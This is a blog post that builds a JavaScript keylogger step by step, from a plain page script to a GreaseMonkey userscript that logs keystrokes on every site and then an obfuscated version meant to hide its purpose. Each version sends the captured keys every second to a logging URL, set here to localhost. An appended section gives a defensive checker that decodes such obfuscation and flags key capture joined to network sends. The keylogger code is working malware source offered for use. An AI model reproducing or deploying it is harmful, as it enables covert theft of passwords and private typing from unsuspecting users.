Some days ago, while I was writing the (traffic magnet) article HYGHAAZG and mentioned the keylogger, a userscript one instantly came to mind. I Googled a bit, but didn't seem to find any (quite amazed)…
Having some time on my hands today, I decided to make one myself. Basically, I made it in three steps (it was specially thought out for a post). First of all, this was the starting point, a.k.a. a typical JavaScript keylogger:
var keys='';
document.onkeypress = function(e) {
    get = window.event?event:e;
    key = get.keyCode?get.keyCode:get.charCode;
    key = String.fromCharCode(key);
    keys+=key;
}
window.setInterval(function(){
    new Image().src = 'http://localhost/junkylogger.php?keys='+keys;
    keys = '';
}, 1000);
As you can see from the code, a JavaScript keylogger is quite simple: attach a function to the key press event, extract the character (its code) from the event and save it into a variable. Also declare a function (run on an interval) that sends the logged keys to the backend, which saves them into a file/database.
As malefic as it seems, you would have to be really lucky to succeed in using it as a relevant keylogger. It would be a good module in an XSS worm. Wanting more from a keylogger, I moved onward to GreaseMonkey, which allows me to have a functional keylogger on every website I wish. Most of it is the same; the difference is that I used GM_setValue/GM_getValue for storing the keys and had to use unsafeWindow for accessing the key press event.
GM_setValue('keys', '');
unsafeWindow.onkeypress = function(e) {
    eventobj = window.event?event:e;
    key = eventobj.keyCode?eventobj.keyCode:eventobj.charCode;
    keys = GM_getValue('keys');
    keys+= String.fromCharCode(key);
    GM_setValue('keys', keys);
}
window.setInterval(function(){
    new Image().src = 'http://localhost/junkylogger.php?keys='+GM_getValue('keys');
    GM_setValue('keys', '');
}, 1000);
The next step was to give it a more obfuscated look, just to make life harder for all those who understand JavaScript only minimally and take a look at the source of the script.
window.wrap = window;
wrap.strf = String.fromCharCode;
wrap.wind = strf(117,110,115,97,102,101,87,105,110,100,111,119);
wrap.ev = strf(111, 110, 107, 101, 121, 112, 114, 101, 115, 115);
GM_setValue('q','');
Function('func', wind+"."+ev+" = func")(function(e) {
    e=window.event?window.event:e;
    k=e.charCode?e.charCode:e.keyCode;
    k=GM_getValue('q')+strf(k);
    GM_setValue('q', k);
});
wrap.loc = strf(104, 116, 116, 112, 58, 47, 47, 108, 111, 99, 97, 108, 104);
wrap.loc+= strf(111, 115, 116, 47, 106, 117, 110, 107, 121, 108, 111, 103, 103, 101);
wrap.loc+= strf(114, 46, 112, 104, 112, 63, 107, 101, 121, 115, 61);
window.setInterval(function(){new Image().src=wrap.loc+GM_getValue('q');GM_setValue('q','')},1000);
No, by downloading this you won't have all your keystrokes logged (unless someone hacked the server and replaced it), because for testing I used a PHP file on my localhost for logging, and that remained in the examples as well.
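An added example, not part of the original post: a small static check a defender could run over a userscript's source before installing it, undoing the character-code obfuscation shown in the last listing. It goes beyond that listing by decoding any such call whatever alias is used; the function names, finding labels and both sample scripts are constructed for this example.

```javascript
// Added example: static pre-install audit of userscript source (heuristic).

// Decode every call shaped like name(104, 116, ...) whose arguments are all
// printable character codes. The function name is ignored on purpose, so an
// alias of String.fromCharCode (such as "strf") is decoded too.
function decodeCharCodeCalls(source) {
  const re = /[\w$.]+\(\s*(\d{1,5}(?:\s*,\s*\d{1,5})+)\s*\)/g;
  const parts = [];
  for (const m of source.matchAll(re)) {
    const codes = m[1].split(',').map((s) => Number(s.trim()));
    if (codes.every((c) => c >= 32 && c < 127)) parts.push(String.fromCharCode(...codes));
  }
  return parts;
}

function auditUserscript(source) {
  // Fragments are joined without a separator so that a string split over
  // several calls (as the URL is in the listing) is reassembled before matching.
  const decoded = decodeCharCodeCalls(source).join('');
  const text = source + '\n' + decoded;
  const findings = [];
  if (/onkey(press|down|up)|addEventListener\(\s*['"]key(press|down|up)/.test(text)) findings.push('key-event-hook');
  if (/unsafeWindow/.test(text)) findings.push('unsafeWindow-access');
  if (/new\s+Image\(\)\.src\s*=|GM_xmlhttpRequest|XMLHttpRequest|fetch\s*\(/.test(text)) findings.push('network-send');
  if (/\bFunction\s*\(|\beval\s*\(/.test(source)) findings.push('dynamic-code');
  if (decoded.length > 0) findings.push('charcode-strings');
  const urls = decoded.match(/https?:\/\/[^\s'"]+/g) || [];
  // Key capture combined with any outbound request is the pattern to block on.
  const suspicious = findings.includes('key-event-hook') && findings.includes('network-send');
  return { findings, decoded, urls, suspicious };
}

// Constructed sample inputs (not real scripts), modelled on the listings above.
const SAMPLE_OBFUSCATED = [
  "var s = String.fromCharCode;",
  "var w = s(117,110,115,97,102,101,87,105,110,100,111,119), ev = s(111,110,107,101,121,112,114,101,115,115);",
  "Function('f', w + '.' + ev + ' = f')(function (e) { GM_setValue('q', GM_getValue('q') + s(e.charCode)); });",
  "var loc = s(104,116,116,112,58,47,47) + s(108,111,99,97,108,104,111,115,116,47);",
  "setInterval(function () { new Image().src = loc + GM_getValue('q'); }, 1000);",
].join('\n');
const SAMPLE_BENIGN = [
  "GM_setValue('theme', 'dark');",
  "document.addEventListener('click', function (e) { console.log(e.target.id); });",
].join('\n');

console.log(auditUserscript(SAMPLE_OBFUSCATED), auditUserscript(SAMPLE_BENIGN));
```

The check is a triage heuristic: a hit means the script deserves a manual read, and a clean result does not prove a script is harmless.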

